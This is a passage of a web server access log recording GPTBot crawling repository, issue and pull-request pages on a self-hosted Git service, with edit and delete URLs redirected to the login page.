"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:18:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:15:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:18:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17053] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17057] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17053] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17054] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17052] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:18:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:18:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__init__.py" [Client 74.7.227.38] [Length 23888] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:18:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:18:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 18041] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:15:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:18:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:18:15:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:18:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:18:15:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:18:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:18:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:18:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13144] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13144] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176812] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" +[17/Feb/2026:18:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481684] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" +[17/Feb/2026:18:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23938] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" +[17/Feb/2026:18:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176808] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 